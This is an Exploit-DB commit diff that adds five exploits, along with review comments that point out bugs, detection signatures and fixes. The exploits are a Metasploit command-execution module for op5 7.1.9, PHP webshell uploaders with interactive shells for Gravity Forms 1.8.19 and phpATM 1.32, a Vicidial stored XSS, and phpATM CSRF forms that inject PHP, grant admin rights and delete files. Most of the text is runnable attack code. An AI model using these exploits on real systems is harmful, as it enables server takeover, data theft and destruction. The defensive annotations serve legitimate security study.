DB: 2016-06-18

5 new exploits

WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload
Vicidial 2.11 - Scripts Stored XSS
phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers
phpATM 1.32 - Multiple Vulnerabilities
op5 v7.1.9 Configuration Command Execution
Offensive Security 2016-06-18 05:02:53 +00:00
parent 2815f48e25
commit 929e1cb538
6 changed files with 648 additions and 0 deletions


@ -36151,3 +36151,8 @@ id,file,description,date,author,platform,type,port
39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80
39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80
39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - CSRF (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80
39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80
39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Stored XSS",2016-06-17,"David Silveiro",php,webapps,80
39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
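Review bot: the description column for 39970 drops the "Authenticated" qualifier that the file's own title carries ("Vicidial 2.11 Scripts - Authenticated Stored XSS"), and 39972's "Multiple Vulnerabilities" loses the classes the file actually documents (CSRF and full path disclosure); since this column is what searches and triage tooling index, suggest "Vicidial 2.11 - Scripts Authenticated Stored XSS" and "phpATM 1.32 - Multiple CSRF Vulnerabilities / Full Path Disclosure" so the precondition and the impact are visible without opening the file. Row counts are consistent: the header's 3/8 matches the three unchanged 2016-06-16 rows plus the five new 2016-06-17 rows, and the file's +8 row of the 648-line total.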


platforms/linux/remote/39973.rb (new executable file, 132 lines)

@ -0,0 +1,132 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'op5 v7.1.9 Configuration Command Execution',
'Description' => %q(
op5 an open source network monitoring software.
The configuration page in version 7.1.9 and below
allows the ability to test a system command, which
can be abused to run arbitrary code as an unpriv user.
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'hyp3rlinx' # discovery
],
'References' =>
[
[ 'EDB', '39676' ],
[ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'unix'],
'Privileged' => false,
'DefaultOptions' => { 'SSL' => true },
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 08 2016'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
], self.class
)
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
/Version: (?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+\|/ =~ res.body
if version && Gem::Version.new(version) <= Gem::Version.new('7.1.9')
vprint_good("Version Detected: #{version}")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
execute_cmdstager(
:flavor => :echo
)
end
def execute_command(cmd, opts)
begin
# To manually view the vuln page, click Manage > Configure > Commands.
# Click the "Test this command" button to display the form we abuse.
# login
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),
'method' => 'POST',
'vars_get' =>
{
'uri' => 'tac/index'
},
'vars_post' =>
{
'csrf_token' => '',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
cookie = res.get_cookies
# exploit
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),
'method' => 'GET',
'cookie' => cookie,
'vars_get' =>
{
'cmd_str' => cmd
}
)
# success means we hang our session, and wont get back a response
if res
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def on_new_session(session)
super
session.shell_command_token('setsid $SHELL')
end
end
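Review bot: in execute_command the `fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?` sits inside `if res`, so it can never fire, and the comment just above says a missing response is the success case; drop the inner nil check and state plainly that only a non-nil response (a non-302 login or an "Access Denied" body) is treated as failure. The two requests also document the exposure precisely for anyone defending op5 7.1.9: a POST to monitor/index.php/auth/login with an empty csrf_token, then an authenticated GET to monitor/op5/nacoma/command_test.php carrying cmd_str, using the 'monitor'/'monitor' credentials the module ships as option defaults. Web-server log entries for command_test.php with a cmd_str parameter are the detection point, the 7.2.0 release notes cited in References are the fix, and changing the default monitor account password removes the module's default success path, which the Description should mention alongside "unpriv user".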

platforms/php/webapps/39969.php (new executable file, 53 lines)

@ -0,0 +1,53 @@
<?php
# Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload
# Vendor Homepage: http://www.gravityforms.com/
# Vulnerable Version(s): 1.8.19 (and below)
# Exploit Author: Abk Khan
# Contact: [ an0nguy @ protonmail.ch ]
# Website: http://blog.lolwaleet.com/
# Category: webapps
# PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!
error_reporting(0);
$domain = 'http://localhost/wordpress';
$url = "$domain/?gf_page=upload";
$shell = "$domain/wp-content/_input_3_khan.php5";
$separator = '-----------------------------------------------------';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if (eregi('ok', $response)) {
echo "$separator\nShell at $shell\n$separator\n\n";
while ($testCom != 'bubye!') {
$user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
echo "$user@b0x:~$ ";
$handle = fopen("php://stdin", 'r');
$testCom = trim(fgets($handle));
fclose($handle);
$comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
echo $comOut;
}
}
else {
die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}
function get_string_between($string, $start, $end)
{
# stolen from stackoverflow!
$string = " " . $string;
$ini = strpos($string, $start);
if ($ini == 0)
return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
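Review bot: the header block has no Date line (the other four files carry one) and credits nobody for discovery; its only reference is a shortened goo.gl link, which will not survive link rot, so cite the original write-up URL and the first fixed plugin version. For triage the single request is the whole bug: `?gf_page=upload` accepts `name=khan.php5` together with `gform_unique_id=../../../../`, so the uploaded body lands at wp-content/_input_3_khan.php5 instead of inside the plugin's upload directory. A WordPress access-log line with gf_page=upload plus a traversal sequence in gform_unique_id or a PHP-family extension in name is a high-confidence indicator, and denying script execution under wp-content for non-core paths limits impact until the plugin is updated.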

platforms/php/webapps/39970.txt (new executable file, 63 lines)

@ -0,0 +1,63 @@
# Exploit Title: Vicidial 2.11 Scripts - Authenticated Stored XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://vicidial.org
# Software Link: https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download
Vicidial is a popular opensource software, used throughout many different sectors,
such as; call centers for inbound & outband calling.
The vulnerablility is triggered when an authenticated with user sufficient permissions,
creates a script (small text document that the agents use for remembering lines)without
sufficient sanitization happening within "Script Name" and "Script Text". Due to the nature
of how widely this script can be set, for example a whole Tele-marketing campaign or specific
agent, it could very easily be used to infect other hosts on the Network.
POC:
http://localhost.com/vicidial_demo/admin.php?ADD=1111111
POST Data (script_name & script_text);
ADD=2111111&DB=&script_id=tests&script_name=<script>alert('XSS!'</script>&script_comments=test&
active=Y&user_group=---ALL---&selectedField=fullname&script_text=<script>alert('XSS 2!'</script>&SUBMIT=SUBMIT
Click 'Preview Script'
<html>
<head></head>
<body bgcolor="white" marginwidth="0" marginheight="0" topmargin="0" leftmargin="0">
<font size="2" color="BLACK" face="ARIAL,HELVETICA">
<font size="2" color="BLACK" face="ARIAL,HELVETICA">
Preview Script: 1017
<br></br>
<table width="600">
<tbody>
<tr>
<td>
<center>
<script>
alert('XSS!')
</script>
<br></br>
</center>
<script>
alert('XSS 2!')
</script>
</td>
</tr>
</tbody>
</table>
</font>
</font>
</body>
</html>
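Review bot: the POST data and the captured output disagree: the payload is written as `script_name=<script>alert('XSS!'</script>` with no closing parenthesis, while the rendered preview shows `alert('XSS!')`, so the request shown is not the one that produced the capture; paste the exact request. "# Date: 0 day" is not a date and should be the disclosure date. The precondition in the title (an authenticated user with sufficient permissions to create scripts) sets the severity and belongs in the CSV description as well. On the application side the capture shows both script_name and script_text reflected verbatim inside the preview's <center> and table cell, so HTML-encoding those two fields wherever they are rendered (preview and agent screens) is the fix, and a POST to admin.php with an ADD= parameter and a <script tag in script_text is a simple, low-noise detection rule.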

platforms/php/webapps/39971.php (new executable file, 220 lines)

@ -0,0 +1,220 @@
<?php
/*
Exploit Title : "phpATM <= 1.32 Remote Command Execution (Shell Upload) on Windows Servers"
Date : 17/06/2016
Author : Paolo Massenio - pmassenio[AT]gmail
Vendor : phpATM - http://phpatm.org/
Version : <= 1.32
Tested on : Windows 10 with XAMPP
__PoF__
"phpATM is the acronym for PHP Advanced Transfer Manager and is a free, open source, PHP based Upload and Download manager.
But unlike most other of its kind it stores the data in flat text files and therefore does not require a database
like MySQL installed on the web server."
The bugged code is in the upload function.
Generally phpATM lets you to register, and then upload some files (no admin privileges required).
The hacking prevention is setted up by a regular expression to avoid .php files upload:
----index.php----
[...]
1544 // Try if file exists Or file is script
1545 if (file_exists("$destination/$userfile_name") ||
1546 eregi($rejectedfiles, $userfile_name) || <--- here the regex
[...]
-----------------
----conf.php----
[...]
307 $rejectedfiles = "^index\.|\.desc$|\.fdesc$|\.dlcnt$|\.vcnt$|\.php$|\.php\..*|\.php3$|\.php3\..*|\.cgi\..*|\.cgi$|\.pl$\.pl\..*|\.php4$|\.ns|\.inc$|\.php5";
[...]
----------------
So if we can upload a file with a space at the end, like this: "shell.php ",
and the file system is running under Microsoft Windows, we can bypass the eregi,
reaching the target to upload a php script file(like a shell)!
The basic requirement is that the server is a Windows based server!
You can upload the shell using a local proxy, like burp suite, or use the exploit below.
*/
if(!isset($argv[1]) && !isset($argv[2]) && !isset($argv[3])){
printInfo();
exit;
}
echo "[+] OK trying to get the PHPSESSID.\n";
$sessid = getPhpsessid($argv[1],$argv[2],$argv[3]);
echo "[+] PHPSESSID for user '".$argv[2]."' grabbed (".$sessid.")\n";
echo "[+] trying to upload the shell.\n";
$shellname = uploadShell($argv[1],$sessid);
echo "[+] OK shell is here: ".$argv[0]."/files/".trim($shellname)."?cmd=command\n\n";
echo "[*] Do you want to run an interactive shell ? [Y/N] ";
$line = fgets(STDIN);
if(trim($line) == 'Y'){
runConsole($argv[1],$shellname);
}
echo "[+] bye\n";
function printInfo(){
$intro = "[*] phpATM <= 1.32 Remote Command Execution (Shell Upload) on Windows Servers\n".
"[*] Founded and coded by Paolo Massenio\n".
"[***] The basic requirement is that the server is a Windows based server!\n".
"[*] usage: php ".$argv[0]." server username password\n".
"[*] Where:\n".
"[*] server is the server with the correct path to phpATM\n".
"[*] username and password are the credentials for the user with 'NORMAL USER' privileges\n".
"[*] cmd is the command you want to execute (OPTIONAL)\n".
"[*] e.g. : php ".$argv[0]." http://site.com/phpATM/ test test\n";
echo $intro;
}
function parseHeaders( $headers )
{
$head = array();
foreach( $headers as $k=>$v )
{
$t = explode( ':', $v, 2 );
if( isset( $t[1] ) )
$head[ trim($t[0]) ] = trim( $t[1] );
else
{
$head[] = $v;
if( preg_match( "#HTTP/[0-9\.]+\s+([0-9]+)#",$v, $out ) )
$head['reponse_code'] = intval($out[1]);
}
}
return $head;
}
function getPhpsessid($server,$user,$pass){
$url = $server.'/login.php';
$data = array('action' => 'userlogin', 'user_name' => $user, 'user_pass' => $pass, 'Submit' => 'Enter');
$options = array(
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data)
)
);
$result = file_get_contents($url, false, stream_context_create($options));
$r_header = parseHeaders($http_response_header);
if ($result === FALSE) {
die("[-] Error during request. Check if your connection is up or if you entered the correct name of the server.");
}
if(!isset($r_header['Location'])){
die("[-] You didn't entered a correct pair user/password.");
}
if(strpos($r_header['Server'],'Win') === false){
die("[-] The server isn't running on Windows. Can't run the exploit.");
}
$sessid = trim(substr(strstr($r_header['Location'],'PHPSESSID'),10));
return $sessid;
}
function uploadShell($server,$phpsessid){
$MULTIPART_BOUNDARY= '--------------------------'.microtime(true);
$shellname = "0x".rand()."_gh0st.php "; //notice the space after .php
$header = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n";
$header .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$header .="Accept-Encoding: gzip, deflate\r\n";
$header .= "Cookie: PHPSESSID=$phpsessid\r\n";
$header .="Connection: close\r\n";
$header .= "Content-Type: multipart/form-data; boundary=$MULTIPART_BOUNDARY";
$content = "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"action\"\r\n\r\n".
"upload\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"directory\"\r\n\r\n".
"\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"order\"\r\n\r\n".
"nom\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"direction\"\r\n\r\n".
"0\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"userfile\"; filename=\"$shellname\"\r\n".
"Content-Type: application/octet-stream\r\n\r\n".
"<?php exec(\$_GET['cmd']); ?>\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"description\"\r\n\r\n".
"\r\n";
$content .= "--$MULTIPART_BOUNDARY--\r\n";
$options = array(
'http' => array(
'method' => 'POST',
'header' => $header,
'content' => $content,
)
);
$url = $server.'/index.php?';
$result = file_get_contents($url, false, stream_context_create($options));
$r_header = parseHeaders($http_response_header);
if ($result === FALSE) {
die("[-] Error during request. Check if your connection is up or if you entered the correct name of the server.");
}
if(!isset($r_header['reponse_code']) && intval($r_header['reponse_code']) != 200){
die("[-] Error during upload.");
}
return $shellname;
}
function runConsole($server,$shellname){
while(1){
echo "Insert cmd ('exit' to quit) > ";
$cmd = fgets(STDIN);
if(trim($cmd) == 'exit' ) die("[+] bye\n");
$query = $server."/files/".trim($shellname)."?cmd=".trim($cmd);
$result = file_get_contents($query);
echo $result."\n";
}
}
?>
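Review bot: the upload check `if(!isset($r_header['reponse_code']) && intval($r_header['reponse_code']) != 200)` is inverted: when the status key is present the first operand is false and the whole condition is false, so a non-200 upload response never reaches "Error during upload"; `||` was evidently intended (the "reponse_code" spelling is at least consistent with parseHeaders). The success message also builds the shell URL from `$argv[0]`, the script name, rather than `$argv[1]`, the server. The write-up itself identifies the real defect well: $rejectedfiles is a deny-list regex applied with eregi to the raw client filename, and Windows drops the trailing space from "shell.php " when the file is written, so the stored name no longer matches the name that was checked. The fix is to normalise (trim) the filename before checking it and to switch to an allow-list of extensions, or to store uploads outside the web root; in logs, a multipart POST to index.php whose filename ends in ".php " followed by GETs to /files/*.php?cmd= is the signature of this script.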

platforms/php/webapps/39972.txt (new executable file, 175 lines)

@ -0,0 +1,175 @@
<!--
Exploit Title : "phpATM <= 1.32 Multiple CSRF Vulnerabilities & Full Path Disclosure Vulnerability"
Date : 17/06/2016
Author : Paolo Massenio - pmassenio[AT]gmail
Vendor : phpATM - http://phpatm.org/
Version : <= 1.32
Tested on : Windows 10 with XAMPP
[1] __CSRF in configure.php__
phpATM lets the administrator to modify the footer or the header through a specific form located in configure.php.
The configure.php page and all of the forms in it are affected by a CSRF bug, so we will focus on the form that
lets you to modify the footer.
This section of code is called when this form is submitted:
---configure.php---
149 case ACTION_SAVEFILE;
$filename = getPostVar('filename');
$filebody = getPostVar('filebody');
if (!isset($filebody))
{ break; }
$filebody = stripslashes($filebody);
$filebody = str_replace("&", "&", $filebody);
$filebody = preg_replace('/[^\x09\x0A\x0D\x20-\x7F]/e', '"&#".ord($0).";"', $filebody);
$fp=@fopen("$cfg_folder_name/$filename","w+");
fwrite($fp, $filebody);
fclose($fp);
show_default(sprintf($mess[167], $filename));
163 break;
-------------------
All the content is saved in the file (e.g. $filename="footer.html").
For example, the footer is included in every page by the show_footer_page() function, like in the index.php page:
---index.php---
[...]
1860 show_footer_page();
[...]
------------------
Let see this function:
---functions.php---
[...]
951 function show_footer_page()
{
global $footerpage, $include_location, $cfg_folder_name; //$footerpage="footer.html"
// The copyright info. Please read GPL license if you are planning to remove it.
echo "\n<div id=\"phpatm\"><br><a href=\"http://phpatm.org/\" target=\"_blank\" title=\"Powered by PHP Advanced Transfer Manager v".PROGRAM_VERSION."\">Powered by phpATM</a><br></div>\n";
// Include the footer page if configured
$footer_path = $include_location.$cfg_folder_name.'/'.$footerpage;
if (file_exists($footer_path))
{ include($footer_path); }
echo "</div></td>\n</tr>\n</table>\n</body>\n</html>";
964 }
[...]
-------------------
So the footer.html is included! We can write whatever we want.
We can basically inject,through the CSRF, some malicius html code (e.g. persistent XSS)
or a malicious PHP code!
Below a very simple example that injects malicious PHP code:
<body onload="document.editfile.submit()">
<form name="editfile" action="http://127.0.0.1/phpATM/configure.php?" method="post">
<input type="hidden" name="action" value="savefile">
<input type="hidden" name="filename" value="footer.htm">
<input type="hidden" name="filebody" value='<?php system($_GET["cmd"]); ?>'>
</form>
</body>
[2] __CSRF in usrmanag.php (1) change user permission__
phpATM lets the administrator to change permission of a generic registered user through a form located in usrmanag.php page.
This page and all of the forms in it are affected by a CSRF bug.
The code below lets to the evil user to modify the permissions:
<body onload="document.useraccount.submit()">
<form name="useraccount" action="http://127.0.0.1/phpATM/usrmanag.php?" method="post" >
<input type="hidden" name="action" value="profile">
<input type="hidden" name="order" value="name">
<input type="hidden" name="letter" value="">
<input type="hidden" name="accpage" value="">
<input type="hidden" name="username" value="test">
<input type="hidden" name="typed_email" value="test@mailinator.com">
<input type="hidden" name="typed_status" value="0">
</form>
</body>
username is the name of the evil user
typed_email is the email of the evil user
typed_status setted to 0 for administrator permissions.
[3] __CSRF in usrmanag.php (2) - delete any file___
phpATM doesn't use any kind of DBMS. The data of the users are collected in some files located in the 'users' folder.
Basically all the informations about a specified user (like username, md5 password, email, etc.) are stored in a file named
like the user.
In usrmanag.php the admin can delete an user account. So the system will basically delete the respective file.
When the form is submitted, is called the change_account_data() function:
----usrmanag.php----
[...]
function change_account_data()
{
[...]
if (isset($deleteaccountcheckbox))
{
if ($deleteaccountcheckbox == "on")
{
unlink("$users_folder_name/$username"); // Delete account file
if (file_exists("$userstat_folder_name/$username.stat"))
{ unlink("$userstat_folder_name/$username.stat"); } // Delete account statistics file
return;
}
}
[...]
}
-------------------
There is no sanification of the $username variable, in fact:
----usrmanag.php----
[...]
$username = getPostVar('username');
[...]
--------------------
----functions.php-----
[...]
function getPostVar($var_name)
{
if (isset($_POST[$var_name]))
{ return $_POST[$var_name]; }
else
{ return $HTTP_POST_VARS[$var_name]; }
}
[...]
--------------------
The form is affected by a CSRF bug, the $username variable isn't saificated, so we can delete
any file by sending a malicious form to the logged Admin!
Here an example:
<body onload="document.useraccount.submit()">
<form name="useraccount" action="http://127.0.0.1/phpATM/usrmanag.php?" method="post" style="margin: 0">
<input type="hidden" name="action" value="profile">
<input type="hidden" name="username" value="../index.php">
<input type="hidden" name="deleteaccountcheckbox" value="on">
</form>
</body>
[4] __FPD__
Simply request the page: http://server/phpATM/index.php?action=view&filename[]=
->
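Review bot: the PoC in section [1] posts `filename="footer.htm"` while the analysis says the included file is `$footerpage="footer.html"`; the two disagree and one should be corrected so the write-up is reproducible. Section [4] stops at "->" without showing the response, so state which path the error message discloses. The three CSRF sections share one root cause visible in the quoted code: no anti-CSRF token on the configure.php and usrmanag.php forms, and getPostVar() returns the raw POST value, so `filename` reaches fopen() and `username` reaches unlink() with no basename() or allow-list check; a per-session token verified on every state-changing POST, plus restricting those two values to a known set of names, closes [1] through [3] together. Spelling in the prose: "malicius", "saificated"/"sanification" (sanitisation), "setted".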